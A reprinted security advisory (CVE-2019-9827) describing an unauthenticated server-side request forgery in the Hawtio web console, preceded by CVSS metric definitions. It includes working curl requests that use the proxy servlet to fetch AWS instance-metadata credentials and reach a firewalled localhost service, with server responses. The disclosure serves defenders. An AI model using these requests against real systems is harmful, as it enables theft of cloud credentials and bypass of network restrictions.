The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
Low
A
There is reduced performance or interruptions in resource availability. However, the attacker does not have the ability to completely prevent access to the resources or services; the impact is limited.
Below is a copy: Hawtio 2.5.0 Server Side Request Forgery
CipherTechs Inc - Security Advisory
Hawtio Server-Side Request Forgery
Introduction
============
Hawtio (https://hawt.io/) is a modular web console for managing Java.
CipherTechs discovered that Hawtio up to and including version 2.5.0
is vulnerable to unauthenticated Server-Side Request Forgery (SSRF).
CVE
===
CVE-2019-9827
Affected Platforms and Versions
===============================
Product: Hawtio
Version: <= 2.5.0
Vulnerability Overview
======================
Security risk: Medium
Attack Vector: Remote
Vendor Status: Notified
Vulnerability Description
=========================
Hawtio by default allows for any unauthenticated user to visit the proxy servlet page (/hawtio/proxy/).
Appending a destination server onto /proxy/ will forward the request from
the Hawtio server. This can be especially dangerous in AWS environments as
it's possible to request instance Metadata and retrieve sensitive information including access keys.
This vulnerability is also dangerous as it could expose internal
applications which allow connections from the Hawtio server's IP address.
Technical Details
=================
By default, versions >= 1.5.0 have a whitelist which only allow connections to 127.0.0.1.
Although the default whitelist settings prevent an attacker from making a
request to any servers outside of the localhost - an attacker could still
request any internal service on the local Hawtio host.
For any Hawtio versions < 1.5.0 an unauthenticated can use the proxy servlet to make a request to any server.
Hawtio <= 1.4.68 - Obtaining AWS Access Keys via SSRF
-----------------------------------------------------
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://169.254.169.254/latest
/meta-data/identity-credentials
/ec2/security-credentials/ec2-instance
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
Access-Control-Allow-Origin: *
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3876041485"
Last-Modified: Thu, 21 Mar 2019 19:36:06 GMT
Content-Length: 1318
Date: Thu, 21 Mar 2019 19:58:45 GMT
Server: EC2ws
{
"Code" : "Success",
"LastUpdated" : "2019-03-21T19:35:50Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "[REDACTED]",
"SecretAccessKey" : "[REDACTED]",
"Token" : "[REDACTED]",
"Expiration" : "2019-03-22T01:38:33Z"
As shown above using the proxy servlet allows any user to obtain AWS metadata information.
Hawtio 2.5.0
------------
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://169.254.169.254/latest
/meta-data/identity-credentials
/ec2/security-credentials/ec2-instance
HTTP/1.1 403 Forbidden
Date: Thu, 21 Mar 2019 20:06:16 GMT
Cache-Control: max-age=0, no-cache, must-revalidate,
proxy-revalidate, private
Pragma: no-cache
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; script-src 'self'
'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline';
font-src 'self' data:; connect-src 'self'; frame-src 'self'
Content-Type: application/json
Content-Length: 29
Server: Jetty(9.4.z-SNAPSHOT)
{"reason":"HOST_NOT_ALLOWED"}
That said, an attacker could still access arbitrary internal services and bypass ingress traffic rules on Hawtio 2.5.0.
A demonstration can be found below.
hawtio$ sudo ufw status numbered
Status: active
To Action From
-- ------ ----
[ 1] 8080 ALLOW IN Anywhere
[ 2] 127.0.0.1 80/tcp ALLOW IN 127.0.0.1
[ 3] 22/tcp ALLOW IN Anywhere
$ curl -i http://hawtio-target/test.txt
curl: (7) Failed to connect to hawtio-target port 80:
Connection refused
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://127.0.0.1/test.txt
HTTP/1.1 200 OK
Date: Thu, 21 Mar 2019 20:18:34 GMT
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, private
Pragma: no-cache
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; script-src 'self'
'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline';
font-src 'self' data:; connect-src 'self'; frame-src 'self'
Server: SimpleHTTP/0.6 Python/2.7.13
Date: Thu, 21 Mar 2019 20:18:34 GMT
Content-Type: text/plain
Last-Modified: Thu, 21 Mar 2019 20:07:34 GMT
Content-Length: 11
Secrets...
Recommendations
===============
Upgrade to at Hawtio >=-1.5.0 to prevent SSRF from accessing arbitrary URLs. Services listening on localhost can still
be accessed through SSRF exploitation in versions > 1.5.0 so CipherTechs recommends disabling the proxy servlet
entirely. CipherTechs did not exhaustively test Hawtio so it is still not recommended to expose this developer tool on
the Internet.
In terms of protecting AWS data, a daemon developed by Netflix-Skunkworks can be implemented to block
all connections to AWS metadata (169.254.169.254). Only a designated user who runs the proxy daemon can access the
metadata service. CipherTechs published a blog post to
implement this solution here: https://www.ciphertechs.com/protecting-aws-metadata-from-zero-day-ssrf-attacks/
Timeline
========
2019.02.25 - Vulnerability Discovered by CipherTechs
2019.03.27 - Redhat Notified
2019.06.27 - 90 day disclosure date
The contents of this advisory are Copyright(c) 2019 CipherTechs Inc.
=====================================================================================
About CipherTechs CipherTechs is a global Cyber Security service provider
founded in 2001 that remains privately held with headquarters in New York
City. CipherTechs is exclusively focused on cyber security and provide a
full service solution portfolio. We service our customers through the
following main practice areas: Offensive Security, Defensive Security,
MSSP and SOC, Audit and Compliance, Training and Product Procurement.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum